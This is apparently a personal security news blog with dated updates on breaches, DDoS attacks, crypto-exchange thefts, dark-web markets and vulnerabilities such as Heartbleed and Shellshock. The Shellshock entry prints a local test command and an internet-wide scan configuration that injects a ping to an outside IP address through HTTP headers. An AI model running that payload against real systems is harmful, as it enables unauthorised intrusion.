Tor & Sony Playstation DDoS-ed

More troubles for Sony, as their PSN gets DDoS-ed on xmas day! The same group (called Lizard Squad) also attacks Tor - enough to cause a scare and force them to issue a warning.

Some information on Lizard Squad - seems like some kids seeking attention (which is common for DDoS attacks). However, since they have been giving interviews to BBC, we maybe looking at an arrest in the making.

More information out. The sqad is offering DDoS services for a fee. However, the whole setup looks amateurish. Back to my earlier thoughts, that the group seems only minimally competent, and looking for some lime-light.

Update 10-Jan-15:
Not surprisingly two members of the squad get arrested.

Security in Cloud Hosting

As IT Security professionals, we are usually quick to sign-off cloud security providers citing data-privacy and/or confidentiality concerns. However, that may not really be true any more. Things are changing and some service providers may even end up providing an orgnaization better security than their in-house data centers.

An article that seem to agree.

ICANN Hacked

Not the worse news we have heard this month, but surely another embarrassment. Simply said, The Internet Corporation for Assigned Names and Numbers (ICANN) is a non-profit organization that is responsible for managing the internet.

Alibaba Websites at risk

I am not very surprised here. Alibaba has been in the limelight since they decided to launch an IPO. I am guessing more eyes are now looking on their websites. Some issues here and here.

Smart-watches compromised

Some bluetooth connected watches checked, and apparently they share data with the phones in clear text. This sounds plain dumb. I am surprised this wasn't discovered sooner.

Finally an easy [no] captcha!

Introducing No CAPTCHA, from Google. It's super simple for humans, and is even more secure against bots.

Sony Pictures Hacked

Update 03-Mar-2016:  
Some report about Operation Blockbuster & Lazarus Group ?

Update 02-Nov-15:
Sony pays $8M to staff, to settle lawsuits

Update 28-May-15:
How cyber-insurance saved the day for Sony, and why this is very important for all of us

Update 19-Apr-15
Wikileaks rolls out a easy to search dump of all the data!

Update 04-Feb-15:
Cost of the restoration/investigation = $35M

Update 26-Jan-15:
Please check my blog here, for a full sum-up

Update 24-Dec-14:
N. Korea got knocked off the internet by a DDoS. Some say US is behind this, in retaliation of Sony hack. But I am sure there is no basis of that theory. North Korea blames Obama!

Update 23-Dec-14:
Seems like there are numerous security gurus (skeptics or realists?!) who believe there is no real evidence to link N Korea with the Sony hack.

Update 20-Dec-14:
Some learnings for all corporates.

Update 17-Dec-14:
Troubles have started pouring in. Employees are filing a class-action law suit against Sony. And we have movie theaters cancelling the shows for the infamous 'interview' movie.

Update 13-Dec-14:
This is getting out of hand. Sony's digital certs have also been compromised, and are being used to sign malware, as legitimate 'sony software'

Update 03-Dec-14:
Employee salary data, healthcare data, and lots more was also leaked!

Update 01-Dec-14
This is really bad: the hackers leaked 5 unreleased movies to torrents. Which effectively means it is now impossible for Sony to contain the leak, since the movies will keep getting circulated over and over again via the P2P network. This will for sure mean some monetary loss for the movies.
Also in the news, is that Sony has hired FireEye's Mandiant to help with the breach.


Update 26-Nov-14
The troubles of Sony, do not seem to go away. This time the Sony Pictures website has been compromised, and "secret and top secret" data was stolen!

List of insecure IP Cams

Update 24-Nov-2014:
Uhhh... the website's guy got a legal warning to take down the website. Now he has a message on the website saying, "Programmer is looking for a good remote job. Skills: Linux, FreeBSD, C/C++, Python, MySQL "
Pity... but funny!!


Update 08-Nov-2014:
A website that indexes all (and a lot!) the cameras running with the default password
This site has been designed in order to show the importance of the security settings. To remove your public camera from this site and make it private the only thing you need to do is to change your camera password.

Let's Encrypt - Free SSL certs

Let's Encrypt:  Free SSL certs, sponsered by Mozilla, CISCO, EFF, et. Now if they do it well, there will be a pile of people knocking on their doors.

When Let’s Encrypt launches in Summer 2015, enabling HTTPS for your site will be as easy as installing a small piece of certificate management software on the server:
$ sudo apt-get install lets-encrypt
$ lets-encrypt example.com
That’s all there is to it! https://example.com is immediately live.

Update 19-Sep-15: The program is now live, get your certs now!

Update 09-Jan-16:  Not surprisingly the bad guys also take advantage of the free service. However, I disagree that this is a bad service. Such attacks were possible even before this free service came about. This just means the bad guys have another avenue for their existing attacks.

Out of band security patch from MS

A zero-day bug being patched, for all Windows servers connected to domains - so organizations need to rush here

Whatsapp's Encryption

Update 19-Nov-14:
Whatsapp introduces end-to-end encryption for Android users. For iOS it is coming soon. This is one feat that is worthy of a standing ovation.

Update 08-Oct-2013:
A good article to explain how the popular IM, whatsapp encrypts the data, and why the algo is flawed. And how the client was disassembled.

Pwn2Own Contest 2014

Update 17-Nov-2014:
November's contest, held in Tokyo:  The only phone left un-hacked was (surprisingly) Windows?! I wonder if that is because of not too many people reviewing it, or if it actually has become secured

Update 18-Mar-2014:
Vupen wins $300K

Update 31-Jan-2014:
After Google announced it's hacking contest (with $2.7M at stake!), HP's ZDI announces Pwn2Own

Crypto Currencies

Update 14-Feb-16:
Nasdaq is looking to use block-chain technology in main stream!

Update 03-Jun-15:
Vulnerability in BlockChain's Android app. Causes multiple users to generate the same random number, which lead to a loss of the coins for a few users.

Update 01-Jun-15:
Ross Ulbricht, the mastermind behind Silk Road, gets life in prison without parole

Update 07-Apr-15:
Bitcoin Foundation is at the verge of bankruptcy. Fires almost everyone, except the volunteers. However, that been said, I wonder what is this foundation planning on doing to being with.

Update 05-Apr-15:
Dark Coins - how to be truly anonymous!

Update 04-Apr-15:
Two fed-agents charged with stealing BTC during the SilkRoad investigation

Update 24-Jan-15:
Winklevoss twins plan regulated Bitcoin exchange

Update 10-Jan-15:
Bitstamp has been compromised now (which is another exchange), and warns customers to not deposit the digital currency. $ 5M loss!

Update 08-Nov-14:
SilkRoad2 busted, the founder arrested. Biggest ever raid on Tor hits 410 website, and over 17 people arrested.

Update 10-Nov-13:
Silk road [2] is back online, using tor

Update 04-Oct-13:
hacker breaks into a forum of bitcoin, steals the DB and puts it up on sale for 25 BTC! Hackers have no respect, even for their own community.

Update 03-Oct-13:
The ebay of illegal drugs and weapons (Silk Road) was busted by FBI, which not surprisingly was using bitcoins to do it's dirty business. The bust had a negative impact on the value of the currency!
The feds decide to auction the confiscated bitcoins.

Update 14-Aug-13:
Now there is a court order to multiple digital currency operators

Update 26-May-13:
Liberty Reserve taken down, now attention shifts to Perfect Money. BitCoin still remains the leader of course. It's not a secret that that these services are used for illegal activities.

Update 08-Aug-2016:
Hong Kong based Bitfinex loses $72M in bitcoin. This caused the exchange rate of the currency to take a nose-dive. The worse part is that the exchange has decided to spread the loss across all users. Hence everyone loses 36% of their bitcoins, immaterial of weather they were impacted by the heist or not.

Update 21-Aug-2016:
Nation state (China) attacking the core bitcoin ! Will the network be able to cope with this?

Update 18-Jul-2017:
A ICO hacked, CoinDash

Update 29-Jul-2017:
BTC-e founder (?) arrested. This was the exchange where most of the cyber-criminals used to cash out their dirty coins.


Android 5.0 Lollipop - Security!

Google has finally released the much awaited (at least by myself) Android L. Lets dive into the new security features, which seem very promising. A true attempt at better managing security with usability.

Arachni - Web Application Security Scanner Framework

A new tool (version-1) is out, for web application scanning. They have a commercial and a free version.

When technology meets laws dated back to '80s

Uber is on the brink of getting kicked out of India. The reason, it cannot adhere to the Regulatory Bank's (RBI) laws:

  1. enforce strong authentication using SMS
  2. Two citizens cannot conduct transactions in foreign currency, unless one holds an RBI-issued forex brokerage license.

Data Breaches Visualized

A visual representation of the data breaches.

POODLE Vulnerability

Update 14-Dec-14:
Poodle vulnerability is back. It has been discovered that this same vulnerability applies to a certain versions of TLS as well.


Update 15-Oct-14:
As if the system admins weren't already sick and tired of patching (Heartbleed and then Shellshock), here comes another vulnerability.

It is now a trend to give your discovered vulnerability a fancy name, and so Google (the discoverer) calls it POODLE, which stands for: Padding Oracle On Downgraded Legacy Encryption.

And no, this isn't even half as bad as Heartbleed or Shellshock:
  1. The vulnerability is present in SSL v3 and earlier.
  2. This vulnerability does not put the servers at a risk, but the clients.
  3. This vulnerability's prerequisite is for the attacker to have network level access to the victim. So, either a MITM, sniffing wifi connections, or being NSA with hooks in the data-centers
Troy Hunt explains it here. Errata explains the risk and myths. Another simple article for dummies.

Hacktivists release a Linux Distribution

Not yet confirmed if it will be a pen-testing compilation or for anonymity. Details here.

Shellshock Bash bug

Newest contender in the market for being the biggest vulnerability discovered. Introduction to it:


What assets are vulnerable?
Bash shells – in other words all assets running unix/linux Operating Systems. This includes servers, networking devices, firewalls, appliance boxes

Which versions of Bash are affected?
Everything through version 4.3. Which means about 25 years’ worth of versions!!

When was this publicly announced?
On Wed 24th around noon (GMT).
This means all the bad guys out there, have the code to attack since then. The longer we wait to defend ourselves, the more likelihood we will become a victim

Mitigating Controls:
simply to disable any CGI functionality that makes calls to a shell and indeed some are recommending this. In many cases though, that’s going to be a seriously breaking change and at the very least, one that going to require some extensive testing to ensure it doesn’t cause immediate problems  

How to check if my asset is vulnerable?
There’s a very simple test - which is just running this command within your shell:
env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"
If you get “busted” echo’d back out and you’ve successfully exploited the bug.

Exploit’s POC?
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74   *
http-header = Host:() { :; }; ping -c 3 209.126.230.74     *  
http-header = Referer:() { :; }; ping -c 3 209.126.230.74  *

*  Essentially asking the vulnerable assets to ping the attacker. This is what a white-hat (non-malicious) attacker would do. A bad-guy would code in something much more sinister

Keyless SSL

Establishing secure connections without sharing the private keys. I am sure this comes at the cost of losing a bit on security, but the benefits are evident!

5 Million Gmail Credentials Leaked

Not clear what is the source of this leak. Apparently Gmail says they were not compromised.

Update 20-Sep-14:
Seems like Google wasn't compromised, and majority of the leaked credentials are incorrect. Could be an old dump?!

Dairy Queen & Home Depot Compormised

Either the hacking activity has increased this year, or maybe the companies are being more honest about public disclosures.

DQ:  A spokesman for Dairy Queen has confirmed that the company recently heard from the U.S. Secret Service about “suspicious activity” related to a strain of card-stealing malware found in hundreds of other retail intrusions.
[update 11-Oct-14] DQ has confirmed the breach at 395 stores

Home Depot:  The latest victim of Russian hackers specializing in point-of-sale (POS) theft appears to be the venerable do-it-yourself store, Home Depot. A large cache of credit- and debit-card information, dubbed ‘American Sanctions,’ has appeared ...

iCloud Bruteforced - Celeb photos leaked

A hacker allegedly breached Apple’s iCloud service and copied the personal photos of at least 100 high-profile stars.
Story Here

Sony PlayStation DDoS-ed

Update 26-Aug-14:
Hackers attack Sony's PlayStation network, and at the same time send a threat to a American Airlines flight, which has the Sony system.

PDF Analysis & Password Cracking Tool

Introducing ParanoiDF

Mike Brown Shooting

Update 15-Aug-14:
Post the incident in America, where an unarmed black teenager was shot down by an unnamed cop, Anonymous releases a threat against the city's IT infrastructure, plus claim to know the name of the cop.

Internet Blackout in Syria

30-Nov-2012:
So the government claims that the terrorist have cut off the cables. In reality that seems unlikely, and looks like the government is trying to control the communications. Not surprisingly, the Anonymous has decided to attack them.  Full Story

11-Dec-2012:
A simple (non-technical) story around what was done by the Govt intentionally.

Update 14-Aug-2014:
Snowden reveals that this was actually (accidentally) caused by NSA

PGP Inventor Announces Blackphone

An encrypted and hardened version of Android, by Phil Zimmerman!

A similar Boeing Blackphone launched.

Update 12-Aug-2014:  Gets rooted in less than 5 mins.

Xiaomi Phones Sending User Data to Home Servers

Update 11-Aug-14:
Security Researchers from F-Secure Antivirus firm has shown that the Xiaomi phones (RedMi 1S handset) send quite a lot of personal and sensitive data to "api.account.xiaomi.com"  server located in China, including following information:
  • IMEI Number of your phone
  • IMSI Number (through MI Cloud)
  • Your contacts and their details
  • Text Messages
More details here and here.

Update 12-Aug-2014:
Xiaomi releases a statement

End to end encryption for emails

25-May-2015:
German government encourages encryption, by setting up easy to use and free service. Commendable move, I hope it is done properly, and does not leave any holes behind.

09-Aug-2014:
Yahoo follows suit, and announces the same for next year.

18-Jun-2014
Another commendable move from Gmail, even tho it comes at the cost of losing a bit business for them

Russian hackers steal 1.2B Web credentials

Criminals in Russia have amassed a huge database of 1.2 billion stolen user names and passwords and half a billion email addresses .... The data, believed to be the single biggest horde of stolen Internet identity information ever collected, was garnered from attacks that reached into every corner of the Web and hit around 420,000 sites, said Hold Security.
Full Story

We have Hold Security, the company who apparently broke this news, who is providing a free service to help you identify if your password has been compromised. Sounds like either a publicity stunt, or a pure bid to steal the passwords.

Can Your Car Be Hacked?

The most hackable vehicles include the 2014 Jeep Cherokee, the 2015 Cadillac Escalade and the 2014 Toyota Prius. The most secure cars include the Dodge Viper, the Audi A8, and the Honda Accord....
Full Story

Update: 22-Jul-15:
Another update from these same guys, but this time taking over a car remotely, over the internet.

Update 02-Nov-15:
A sarcastic article on the critiques of this hack

Update 21-Nov-15:
Chrysler Recalls 1.4m Vehicles, to patch the flaw. Some good thoughts here:
People keep computers for a few years, but cars for decades,” Camp said. “So when would an automobile company declare ‘end of life’ for supporting legacy cars that are found to have hackable defects....
Update 03-Aug-16:
The duo is back to hack the patched Jeep - again

Concerned about NSA? Switch to typewriters!

Germany and Russia are both considering replacing computers, with typewriters to avoid data-leakages (ref: Prism).
Smart move? Or a hasty decision without investigating all the possible alternatives?
"Bugcrowd is all about connecting independent security researchers with companies big and small"
Introducing BugCrowd

Why Open Source isn't neccessarily secure

A good article on why open source isn't necessarily more secure. Personally I think the author doesn't take into account multiple factors, such as turn-around time to patch an identified vulnerability, or how active a product is to engage white-hat hackers.

European Central Bank Hacked; 20K Email Addresses Stolen

The hackers anonymously alerted the bank via e-mail, asking a ransom for the data.....  The ECB was quick to downplay the ramifications. "No internal systems or market sensitive data were compromised," it said in a statement. However, there is quite a lot that hackers can do with 20,000 emails, including spamming, phishing, brute-forcing the accounts and testing them as credentials for other, more sensitive sites like online banking.
Full Story

eBay Hacked - 128 Million Users Change Passwords NOW!

Update 22-May-2014:
Ebay's employees compromised. Their press release is here. An independent analysis by Troy Hunt

Update 27-May-2014:
Post the credential compromise, now an XSS exploit has been released which could lead to the compromise of any user's account!

Update 24-Jul-14:
Ebay faces a class-action lawsuit!

Google Project Zero

Google's project tries to put an end to the wide impact of zero-day exploits. Scope has no bounds, and all the findings will be responsibly disclosed to the public. Sounds very ambitious!!

Unauthorized Google Certs Issues by NIC, India

The National Informatics Centre (NIC) of India, which holds several intermediate CA certificates trusted by the Indian Controller of Certifying Authorities (India CCA), issued unauthorized certificates for Google's domains.

Mastering Kali Linux for Advanced Penetration Testing

I was requested by PacktPub to review a second book on Kali. The book is now published and available here.

Encrypted IM obscures metadata

Now a tool, which not only encrypts the messages, but also leaves no meta-data, since it is all P2P. Called invisible.im
More info here

Mainstream Extortion

The year 2014 may well go down in the history books as the year that extortion attacks went mainstream. Fueled largely by the emergence of the anonymous online currency Bitcoin, these shakedowns are blurring the lines between online and offline fraud
Full story also introducing telephone's DDoS attacks!
 

Most attacked ports

Port 445 (MS SMB) and Port 5000 (universal plug and play) are the most attacked ports.

"10 Ways to Fix Cybersecurity" What the leaders say?

A must read article that breaks down the answers from industry (so-called) leaders around security. And you realize there is less advise and more sales-pitch in there.

Hacker puts 'full redundancy' codespaces.com out of business

A code-hosting and project management services provider was forced to shut down operations indefinitely after a hacker broke into its cloud infrastructure and deleted customer data, including most of the company's backups.
Important learning:

  1. Cloud DOES not make you any more secure, in many ways it makes you less secure
  2. Don't put all your eggs in one basket - host backups at a different location, with a different service provider
Story here and here

Singaporean's Singpass Compromised

Singpass, the Singaporean national ID card, has been compromised. Early reports suggest a breach of about 1560 accounts.

Iranian Hacker's 3 year old Sting Op

a three-year old cyber espionage campaign which they believe to have originated in Iran, targeting a number of military and political leaders in the United States, Israel and other countries by creating false social networking accounts and a fake news website.
Story here & here 

True Crypt shuts down, but why?

One of the most famous tools for disk encryption, shuts down, without any explanation!!?? The recommendation is to migrate to Microsoft's Bitlocker (yikes)




Spotify hacked

Today, the popular Music streaming service Spotify said the company has suffered a Data breach and warned users of its Android app to upgrade it in the wake of a potential data breach in their servers.
Full Story 

Aussie Apple Fans Get Pawned

A mysterious new scam has emerged targeting Antipodean iPhone, iPad and iMac users by locking their devices via “Find My iPhone” technology and holding them to ransom.
Full Story  &  Troy Hunt's Analysis

London - Latest Victim of Car Hacking

Thieves are hacking into these on-board computers using cell-phone-sized electronic devices originally designed for locksmiths.
Full Story 

Anonymous Philippines Defaces Chinese websites

"Anonymous Philippines" claimed responsibility for defacing more than 200 Chinese websites in retaliation for Beijing's aggressive actions in the West Philippine Sea, according to the messages posted on their Facebook page.
Full Story

Diving Underground: Fake ID's & Passports

Continuing with the research of the underground, here is one of the many service providers, promising as-good-as real passports, driving licenses, and ID cards. The payment mode remains BTC








ISC2's Vulnerability

This is plain embarrassing, organizations like (ISC)2 do not take basic security measures.

Antivirus is Dead

Nothing new in here, but a good writeup on why AV is not a reliable security control now. Still a must have investment, but do not expect much from them.

Bitly Hacked!

Bitly's been hacked, reset your passwords and APIs now. Bitly's own public release is here.

OpenID, OAuth Vulnerability

Account hijacking is all too common in social networking, but a wider-spread problem has affected almost all major OAuth 2.0 and OpenID providers, such as Facebook, Google, Yahoo, LinkedIn, Microsoft, GitHub, QQ, Taobao, Weibo, VK, Mail.Ru and Sohu, have been affected by a serious covert redirect vulnerability.\
Full Story

Police Use New Tool To Source Crowds for Evidence

Leading edge technology, or will it be the bleeding edge nightmare?
A new crime-fighting innovation known as LEEDIR, the Large Emergency Event Digital Information Repository, pairs an app with cloud storage to help police use smartphones as tools to gather evidence. The crowdsourcing system gives authorities a secure, central repository for the countless electronic tips that can come in during a crisis.

Diving Underground: Counterfeit Currency

Continuing with my research of the underground market, I stumbled upon a website which offers USD and Euro currency, at a discount of up to 75%. The payment is to be made via bitcoins (of course).

A screenshot of the website is pasted below. However, it does make me wonder, how the buyer could be assured of the legitimacy of the seller. Unlike ebay, there is no easy way here to give a negative feedback. Nevertheless, another insight into the thriving underground.


Kali Linux Hacked!

Kali (formerly called Backtrack) became the latest victim of heartbleed. A bit sad to see a pen-testing community go down.

Microsoft warns Internet Explorer 6 to 11 vulnerable to zero-day spotted in the wild

As expected we now have MS vulnerabilities that will not be patched for the XP users. So, potentially this means a lottery for the bad guys, who will have unlimited access to potentially half a billion workstations. Sure, it is possible to have mitigating controls, to avoid this vulnerability. The question is how many of the users would bother to?!

An Eavesdropping Lamp That Livetweets Private Conversations

Two artists have revealed Conversnitch, a device they built for less than $100 that resembles a lightbulb or lamp and surreptitiously listens in on nearby conversations and posts snippets of transcribed audio to Twitter
Full Story 

Tails - Internet Anonymity

Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship almost anywhere
Good article on it is here, and the tool's home page is here.

Update 24-Jul-14:
A serious vulnerability discovered

Diving Underground: Stolen PayPal Accounts:

Below is one of the many professional and well designed websites, that offers stolen PayPal accounts, in a simple 3 step process. Buyer's anonymity is maintained, thanks to Tor, temporary emails, and the use of BitCoin.

Step #1

Step #2

Step #3

HeartBleed explained xkcd style


Hearbleed Bug - Impacting OpenSSL

The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. 
In short - patch this now! And change your passwords on all the websites that were impacted here.

Some explanations here
Tech help here
Home page for the bug
Easy to read explanation
A good FAQ page, management style.

Update 10-May-2014:
300K servers are still vulnerable!

Windows XP to die in April 2014

Update 08-Apr-2013:
Considering there are 39% desktops on the internet still using it, it is highly unlikely that everyone will upgrade by that time. So, does this mean party time for the hackers?

Update 03-Apr-2014: 
Infection rate may jump 66% after patches end in April
28% desktops on the internet still using XP!

Update 10-Apr-2014
Risks of running XP desktops

Update 27-May-2014
A registry hack, to help get free updates until 2019!

Update 28-May-2014:
MS warns against the use of this reg hack.

Update 09-Jun-2014:
An essay on why XP is even more vulnerable, since Apr-2014?

Diving Underground - A Research

I have been researching the underground e-markets, or the dark-corners of the web (as it is popularly called) for a while now.

As I dig deeper, what I keep finding is just jaw-dropping. From drugs, to money laundering services, to pirated softwares, games, books, name it and it is here. Which is nothing new, I am sure web has been famous for that for a while now. The only reason I am surprised is that how easy it is becoming to commit an online fraud.


Update 20-Feb-2016:
Trying to finding tor websites, why not try Quora?

Full Disclosure list shuts down

This is the end of an era, with a sad (troubled?) farewell.

Update 26-Mar-2014:
And it is back (lol), but with a new moderator.

Google's DNS compromised

Google's famous (& free) DNS hijacked (IP = 8.8.8.8), for 22 mins!

On March 16, the network security company BGPmon reported that Google's Public DNS server, 8.8.8.8, was hijacked for Internet users in Brazil and Venezuela for 22 minutes. During this so-called MiM attack, anyone seeking a Web site, e-mail server, or the like was redirected to a site belonging to British Telecomm's Latin America division. The assault seems to have been result of Border Gateway Protocol (BGP) hijacking.

Update 30-Mar-2014:
Turkish ISP's take over Google DNS

US To Hand Over Control of Internet Domain Names

What? USA is letting go of their control?!
Real? or bluff after Prism?

After 16 years of being in control of a large portion of the Internet, the Internet Corp. for Assigned Names and Numbers (ICANN) is handing over oversight of the Domain Name System (DNS) to another organization. 

A class action law-suit, for victims of stolen personal data

Now this is progression in the right direction. Ensuring organizations assuming liability for digital negligence!

The Dec. 2009 theft of laptops belonging to AvMed, a Florida-based health insurer, exposed the patient records of tens of thousands of its customers.
The plaintiffs suffered no direct losses or identity theft from the breach but nevertheless accused AvMed of negligence, breach of contract, breach of fiduciary duty and unjust enrichment

Sim card based end-to-end encryption

In collaboration with its security partner Giesecke & Devrient which is an international leader in mobile security solutions, Vodafone is offering an end-to-end encryption for mobile communication based on the phone SIM card.
Full Story

Google Maps Create Fake Listings

Google calls this spam, but I am thinking this could be more damaging. Create any fake business, go over Google's verification, and voila - till the time it is flagged down as spam, your business is up!

100+ Singapore Websites Defacaed

In a period of 2 days, over 100 websites defaced, with a message:
Hacked By Mr.AzRooT
[ People advising others often forget that the same advice applies to their life as well. ]

Tesco user credentials published

A hacker publsihed 2240 user accounts and cleartext password on pastebin. At the face of it looked like a breach of their servers. However, Troy investigated and has a different theory.

Now a 400 GBps DDoS attack

Largest in the history, and much bigger than last year's Spamhaus attack [biggest at the time].
Using NTP reflection attack, similar to what was used to attack a few gaming websites recently.

Some more details here. Symantec's tech details

Sochi Olympics hit the security news!

"The U.S. State Department has told Americans coming to Sochi that they should have 'no expectation of privacy,' 
For now, looks like USA is trying to make the Russians look bad, without any solid evidence

Whistleblower give a blow to Barclays Bank

A Snowden-style finance whistleblower, who seems to have grown a conscience, has blown the whistle on Barclays bank for the loss and subsequent mis-use of 27,000 files of detailed personal data on customers and potential customers. Those files reached the hands of rogue traders known as 'spank shops.'
Full Story 

ISO standard 30111

I believe this was much needed. I am yet to read it, but knowing ISO I am sure it will act as a good guideline.

Starbucks App stores password in cleartext - a 'known' feature

Unbelievable!
Two executives -- Starbucks CIO Curt Garner and Starbucks Chief Digital Officer Adam Brotman -- said in a telephone interview that they have known for an unspecified period of time that the credentials were being stored in clear text. "We were aware," Brotman said. "That was not something that was news to us."

JP Morgan hit by a 'piggy-back' attack

In December-2013 JP Morgan lost 2% of it's credit card customer data. Now a phishing attack to piggy-back on this first attack!
Full Story

Hackers expose phone information of 4.6M Snapchat users

The original website of the hackers has been taken down, I paste their message below.
More info here and here.

You are downloading 4.6 million users' phone number information, along with their usernames. People tend to use the same username around the web so you can use this information to find phone number information associated with Facebook and Twitter accounts, or simply to figure out the phone numbers of people you wish to get in touch with. 
This database contains username and phone number pairs of a vast majority of the Snapchat users. This information was acquired through the recently patched Snapchat exploit and is being shared with the public to raise awareness on the issue. The company was too reluctant at patching the exploit until they knew it was too late and companies that we trust with our information should be more careful when dealing with it. 
For now, we have censored the last two digits of the phone numbers in order to minimize spam and abuse. Feel free to contact us to ask for the uncensored database. Under certain circumstances, we may agree to release it